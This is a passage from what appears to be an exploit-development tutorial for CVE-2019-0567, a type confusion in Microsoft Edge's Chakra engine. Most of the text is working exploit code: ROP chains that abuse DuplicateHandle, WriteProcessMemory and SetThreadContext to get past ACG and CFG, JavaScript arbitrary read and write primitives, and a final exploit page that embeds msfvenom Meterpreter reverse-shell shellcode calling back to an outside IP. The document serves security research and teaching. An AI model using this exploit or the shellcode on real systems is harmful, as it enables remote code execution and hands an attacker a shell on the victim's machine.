write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // ret gadget we want to overwrite our remote thread's RIP with 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)
next();

// WriteProcessMemory() ROP chain (Number 4)
// Stage 9 -> Write our ROP chain to the remote process, using the JIT handle and the leaked stack via GetThreadContext()

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000100, 0x00000000);             // SIZE_T nSize (0x100) (CONTEXT.Rsp is writable and a "full" stack, so 0x100 is more than enough)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118-0x08, kernelbaseHigh);      // .data section of kernelbase.dll where CONTEXT.Rsp resides
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret (Pointer to CONTEXT.Rsp)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26ef31, chakraHigh);      // 0x18026ef31: mov rax, qword [rax] ; ret (get CONTEXT.Rsp)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x435f21, chakraHigh);      // 0x180435f21: mov rdx, rax ; mov rax, rdx ; add rsp, 0x28 ; ret (RAX and RDX now both have CONTEXT.Rsp)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPCVOID lpBuffer (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropBegin, chakraHigh);      // .data section of chakra.dll where our ROP chain is
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds the full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it  

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x20)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Setting a jmp rax breakpoint, and then after stepping through the CONTEXT.Rip update and CONTEXT.Rsp saving gadgets, we can start executing our WriteProcessMemory ROP chain.

As we can see, we set nSize to 0x100. We are attempting to copy our ROP chain into the JIT process, and our ROP chain is much smaller than 0x100. However, instead of calculating the size, we simply can just use 0x100 bytes as we have a full stack to work with in the remote process and it is writable. After setting the size, our call is in the following state:

WriteProcessMemory(
	-
	-
	-
	sizeof(rop_chain)			// Size of our ROP chain
	-
);

The next parameter we will fix is lpBaseAddress, which will be where we want to write the ROP chain. In this case, it is the stack location, which we can leak from our preserved CONTEXT.Rsp address.

Using the same “trick” as before, our mov rdx, [rdx+0x8] gadget is circumvented by simply subtracting 0x8 before had the value we want to place in RDX. From here, we can clearly see we have extracted what CONTEXT.Rsp pointed to - and that is the stack within the JIT process.

Our call is in the following state:

WriteProcessMemory(
	-
	addressof(CONTEXT.Rsp),			// Address of our remote thread's stack
	-
	sizeof(rop_chain)			// Size of our ROP chain
	-
);

Next up is the lpBuffer parameter. This parameter is very straight forward, as we can simply just pop the address of the .data section of chakra.dll where our ROP chain was placed.

Our call is now in the below state:

WriteProcessMemory(
	-
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	-
);

The next (and last register-placed parameter) is our HANDLE.

We now have our call almost completed:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	-
);

Lastly, all we need to do is set a NULL value of RSP + 0x28 and set RAX to WriteProcessMemory. The full call can be seen below:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	NULL 						// Optional
);

We can then attach another WinDbg session to the JIT process and examine the write operation.

As we can see, we have remotely placed our ROP chain to RSP! All we have to do now is update our thread’s RIP member via SetThreadContext and then resume the thread to kick off execution!

SetThreadContext and ResumeThread ROP Chain

All that is left now is to set the thread’s CONTEXT and resume the thread. Here is how this looks:

SetThreadContext(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)		// The updated CONTEXT structure
);
ResumeThread(
	threadHandle,				// A handle to the thread we want to resume (our thread we created via CreateRemoteThread)
);

Here is our final exploit:

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()
    {
        countMe+=0x8;
    }

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.16.55.195 LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);
	inc();

	// Increment countMe (which is the variable used to write 1 QWORD at a time) by 0x50 bytes to give us some breathing room between our shellcode and ROP chain
	countMe += 0x50;

	// Store where our ROP chain begins
	ropBegin = countMe;

	// VirtualProtect() ROP chain (will be called in the JIT process)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetOne = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetTwo = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
    inc();

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// Confirm exploit 
	alert("[+] Press OK to enjoy the Meterpreter shell :)");

	// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
	jitHandle = read64(chakraLo+0x74d838, chakraHigh);

	// Helper function to be called after each stack write to increment offset to be written to
	function next()
	{
	    counter+=0x8;
	}

	// Begin ROP chain
	// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
	// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
	// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

	// DuplicateHandle() ROP chain
	// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
	// ACG is disabled in the JIT process
	// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

	// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

	// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

	// HANDLE hSourceHandle (RDX)
	// (HANDLE)-1 value of current process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
	next();

	// HANDLE hTargetProcessHandle (R8)
	// (HANDLE)-1 value of current process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
